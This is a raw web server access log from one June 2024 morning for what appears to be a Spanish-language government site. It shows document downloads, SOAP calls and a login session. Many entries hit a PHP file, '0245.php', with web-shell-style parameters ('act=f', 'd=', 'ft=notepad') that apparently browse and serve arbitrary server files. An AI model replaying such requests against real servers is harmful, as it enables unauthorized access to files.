47.128.24.60 - - [20/Jun/2024:04:27:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2451-2500%5C&f=00002476.tif&white=1 HTTP/1.1" 200 95052
201.245.192.253 - - [20/Jun/2024:04:27:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:04:27:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33086
201.245.192.253 - - [20/Jun/2024:04:27:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34822
201.245.192.253 - - [20/Jun/2024:04:27:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:04:26:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.22.255 - - [20/Jun/2024:04:27:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000222.tif&ft=img&white=1 HTTP/1.1" 200 203410
201.245.192.253 - - [20/Jun/2024:04:28:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.245.221.92 - - [20/Jun/2024:04:28:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:04:28:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:28:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.90 - - [20/Jun/2024:04:28:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2620.pdf&ft=img&white=1 HTTP/1.1" 200 372495
172.22.2.4 - - [20/Jun/2024:04:27:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [20/Jun/2024:04:29:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.27.240 - - [20/Jun/2024:04:29:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000%5C&f=00002985.tif&white=1 HTTP/1.1" 200 37332
114.119.135.199 - - [20/Jun/2024:04:29:47 -0500] "GET /galeria/galeria/fotos/Humedal-Vaca4P.jpg HTTP/1.1" 200 33055
66.249.66.21 - - [20/Jun/2024:04:29:48 -0500] "GET /Publicaciones/2024EE83612.pdf HTTP/1.1" 404 227
201.245.192.253 - - [20/Jun/2024:04:29:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.19 - - [20/Jun/2024:04:29:49 -0500] "GET /BLA/resoluciones/AUTOS%202023/0475.pdf HTTP/1.1" 200 463469
47.128.126.170 - - [20/Jun/2024:04:30:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000%5C&f=00002964.tif&white=1 HTTP/1.1" 200 37084
201.245.192.253 - - [20/Jun/2024:04:30:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:30:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:04:29:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33433
201.245.192.253 - - [20/Jun/2024:04:30:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34822
47.128.113.8 - - [20/Jun/2024:04:30:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2351-2400%5C&f=00002399.tif&white=1 HTTP/1.1" 200 245508
201.245.192.253 - - [20/Jun/2024:04:31:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.74 - - [20/Jun/2024:04:31:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_RebeldesBolero.flv&ft=notepad&white=1 HTTP/1.1" 200 57188018
201.245.192.253 - - [20/Jun/2024:04:31:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.53.85 - - [20/Jun/2024:04:32:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=1908.pdf&ft=notepad&white=1 HTTP/1.1" 200 626377
201.245.192.253 - - [20/Jun/2024:04:32:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:32:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
20.240.18.36 - - [20/Jun/2024:04:32:32 -0500] "GET /Publicaciones/2024EE115982.pdf HTTP/1.1" 404 228
216.244.66.195 - - [20/Jun/2024:04:32:56 -0500] "GET /BLA/resoluciones/AUTOS%202007/0212.pdf HTTP/1.1" 200 13571
216.244.66.195 - - [20/Jun/2024:04:33:01 -0500] "GET /BLA/resoluciones/AUTOS%202007/0223.pdf HTTP/1.1" 200 19734
216.244.66.195 - - [20/Jun/2024:04:33:06 -0500] "GET /BLA/resoluciones/AUTOS%202007/0268.pdf HTTP/1.1" 200 82600
216.244.66.195 - - [20/Jun/2024:04:33:10 -0500] "GET /BLA/resoluciones/AUTOS%202007/0286.pdf HTTP/1.1" 200 69121
201.245.192.253 - - [20/Jun/2024:04:33:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.17.146 - - [20/Jun/2024:04:33:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1101-1150%5C&f=00001139.tif&ft=notepad&white=1 HTTP/1.1" 200 257733
216.244.66.195 - - [20/Jun/2024:04:33:13 -0500] "GET /BLA/resoluciones/AUTOS%202007/0495.pdf HTTP/1.1" 200 17189
216.244.66.195 - - [20/Jun/2024:04:33:16 -0500] "GET /BLA/resoluciones/AUTOS%202007/0600.pdf HTTP/1.1" 200 65935
216.244.66.195 - - [20/Jun/2024:04:33:19 -0500] "GET /BLA/resoluciones/AUTOS%202007/0682.pdf HTTP/1.1" 200 203092
216.244.66.195 - - [20/Jun/2024:04:33:21 -0500] "GET /BLA/resoluciones/AUTOS%202007/0863.pdf HTTP/1.1" 200 74722
216.244.66.195 - - [20/Jun/2024:04:33:24 -0500] "GET /BLA/resoluciones/AUTOS%202007/0913.pdf HTTP/1.1" 200 163425
216.244.66.195 - - [20/Jun/2024:04:33:26 -0500] "GET /BLA/resoluciones/AUTOS%202007/0952.pdf HTTP/1.1" 200 24042
216.245.221.92 - - [20/Jun/2024:04:33:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Jun/2024:04:33:27 -0500] "GET /BLA/resoluciones/AUTOS%202007/1569.pdf HTTP/1.1" 200 31642
201.245.192.253 - - [20/Jun/2024:04:33:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [20/Jun/2024:04:33:31 -0500] "GET /BLA/resoluciones/AUTOS%202007/1789.pdf HTTP/1.1" 200 43276
216.244.66.195 - - [20/Jun/2024:04:33:34 -0500] "GET /BLA/resoluciones/AUTOS%202007/1795.pdf HTTP/1.1" 200 132646
216.244.66.195 - - [20/Jun/2024:04:33:42 -0500] "GET /BLA/resoluciones/AUTOS%202009/0819.pdf HTTP/1.1" 200 77573
172.22.2.4 - - [20/Jun/2024:04:32:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [20/Jun/2024:04:33:47 -0500] "GET /BLA/resoluciones/AUTOS%202009/0852.pdf HTTP/1.1" 200 61414
201.245.192.253 - - [20/Jun/2024:04:33:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [20/Jun/2024:04:33:52 -0500] "GET /BLA/resoluciones/AUTOS%202009/1660.pdf HTTP/1.1" 200 281409
47.128.113.66 - - [20/Jun/2024:04:33:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=0893.tif&ft=notepad&white=1 HTTP/1.1" 200 140710
216.244.66.195 - - [20/Jun/2024:04:34:08 -0500] "GET /BLA/resoluciones/AUTOS%202009/1671.pdf HTTP/1.1" 200 124364
216.244.66.195 - - [20/Jun/2024:04:34:19 -0500] "GET /BLA/resoluciones/AUTOS%202009/1678.pdf HTTP/1.1" 200 122243
201.245.192.253 - - [20/Jun/2024:04:34:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:34:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [20/Jun/2024:04:34:29 -0500] "GET /BLA/resoluciones/AUTOS%202009/1705.pdf HTTP/1.1" 200 124221
172.22.2.4 - - [20/Jun/2024:04:32:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
47.128.54.100 - - [20/Jun/2024:04:34:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3268.pdf&ft=img&white=1 HTTP/1.1" 200 388879
216.244.66.195 - - [20/Jun/2024:04:34:41 -0500] "GET /BLA/resoluciones/AUTOS%202009/1940.pdf HTTP/1.1" 200 218255
216.244.66.195 - - [20/Jun/2024:04:34:57 -0500] "GET /BLA/resoluciones/AUTOS%202009/2031.pdf HTTP/1.1" 200 99876
216.244.66.195 - - [20/Jun/2024:04:35:11 -0500] "GET /galeria/galeria/fotos/Humedal-la-Isla1G.jpg HTTP/1.1" 200 216243
216.244.66.195 - - [20/Jun/2024:04:35:23 -0500] "GET /BLA/resoluciones/AUTOS%202022/05161.pdf HTTP/1.1" 200 361354
47.128.21.205 - - [20/Jun/2024:04:35:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=2000+1000-1049.tif&ft=notepad&white=1 HTTP/1.1" 200 20159
201.245.192.253 - - [20/Jun/2024:04:35:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:04:35:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [20/Jun/2024:04:36:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/01285.pdf HTTP/1.1" 200 487601
47.128.119.164 - - [20/Jun/2024:04:36:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2635.pdf&ft=img&white=1 HTTP/1.1" 200 98063
201.245.192.253 - - [20/Jun/2024:04:36:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:36:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.58.130 - - [20/Jun/2024:04:36:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1101-1150%5C&f=00001150.tif&ft=notepad&white=1 HTTP/1.1" 200 218262
168.119.252.243 - - [20/Jun/2024:04:37:27 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [20/Jun/2024:04:37:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.39.162 - - [20/Jun/2024:04:37:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4638.pdf&ft=img&white=1 HTTP/1.1" 200 671503
201.245.192.253 - - [20/Jun/2024:04:37:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33086
201.245.192.253 - - [20/Jun/2024:04:37:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34822
201.245.192.253 - - [20/Jun/2024:04:37:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.21 - - [20/Jun/2024:04:37:52 -0500] "GET /Publicaciones/2024EE73985.pdf HTTP/1.1" 404 227
201.245.192.253 - - [20/Jun/2024:04:38:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.17.198 - - [20/Jun/2024:04:38:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2457.pdf&ft=img&white=1 HTTP/1.1" 200 356111
216.245.221.92 - - [20/Jun/2024:04:38:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:04:38:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:38:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:04:39:02 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 304 -
47.128.58.15 - - [20/Jun/2024:04:39:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000%5C&f=00002970.tif&white=1 HTTP/1.1" 200 85562
201.245.192.253 - - [20/Jun/2024:04:39:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:04:37:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:04:39:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33433
201.245.192.253 - - [20/Jun/2024:04:39:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.19 - - [20/Jun/2024:04:39:52 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202022/4968.pdf HTTP/1.1" 304 -
47.128.51.130 - - [20/Jun/2024:04:39:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000%5C&f=00002952.tif&white=1 HTTP/1.1" 200 241412
201.245.192.253 - - [20/Jun/2024:04:40:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34822
172.22.2.4 - - [20/Jun/2024:04:38:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [20/Jun/2024:04:40:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:40:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
168.119.52.80 - - [20/Jun/2024:04:40:34 -0500] "GET / HTTP/1.1" 200 4720
47.128.48.224 - - [20/Jun/2024:04:40:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000%5C&f=00002969.tif&white=1 HTTP/1.1" 200 528132
47.128.58.166 - - [20/Jun/2024:04:41:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5579.pdf&ft=img&white=1 HTTP/1.1" 200 98063
201.245.192.253 - - [20/Jun/2024:04:41:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:04:41:34 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [20/Jun/2024:04:41:39 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
172.22.2.4 - - [20/Jun/2024:04:41:40 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [20/Jun/2024:04:41:40 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [20/Jun/2024:04:41:40 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [20/Jun/2024:04:41:41 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [20/Jun/2024:04:41:41 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
201.245.192.253 - - [20/Jun/2024:04:41:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:04:41:59 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
47.128.37.213 - - [20/Jun/2024:04:42:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2351-2400%5C&f=00002372.tif&white=1 HTTP/1.1" 200 56002
172.22.2.4 - - [20/Jun/2024:04:42:11 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [20/Jun/2024:04:42:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:42:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:04:42:29 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
47.128.42.70 - - [20/Jun/2024:04:42:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=flowplayer-3.2.6.swf&ft=notepad&white=1 HTTP/1.1" 200 20157
190.25.103.31 - - [20/Jun/2024:04:42:53 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
190.25.103.31 - - [20/Jun/2024:04:42:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
190.25.103.31 - - [20/Jun/2024:04:42:53 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12410
190.25.103.31 - - [20/Jun/2024:04:42:53 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.25.103.31 - - [20/Jun/2024:04:42:53 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
190.25.103.31 - - [20/Jun/2024:04:42:53 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:53 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
190.25.103.31 - - [20/Jun/2024:04:42:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:53 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
190.25.103.31 - - [20/Jun/2024:04:42:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
190.25.103.31 - - [20/Jun/2024:04:42:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
190.25.103.31 - - [20/Jun/2024:04:42:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
190.25.103.31 - - [20/Jun/2024:04:42:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
190.25.103.31 - - [20/Jun/2024:04:42:54 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
190.25.103.31 - - [20/Jun/2024:04:42:54 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
190.25.103.31 - - [20/Jun/2024:04:42:54 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
66.249.66.21 - - [20/Jun/2024:04:42:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1604.pdf HTTP/1.1" 200 925039
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16294
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
190.25.103.31 - - [20/Jun/2024:04:42:58 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
190.25.103.31 - - [20/Jun/2024:04:43:00 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:00 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
190.25.103.31 - - [20/Jun/2024:04:43:01 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 40358
190.25.103.31 - - [20/Jun/2024:04:43:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:02 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1436
201.245.192.253 - - [20/Jun/2024:04:43:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
190.25.103.31 - - [20/Jun/2024:04:43:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 114269
190.25.103.31 - - [20/Jun/2024:04:43:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:07 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.103.31 - - [20/Jun/2024:04:43:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
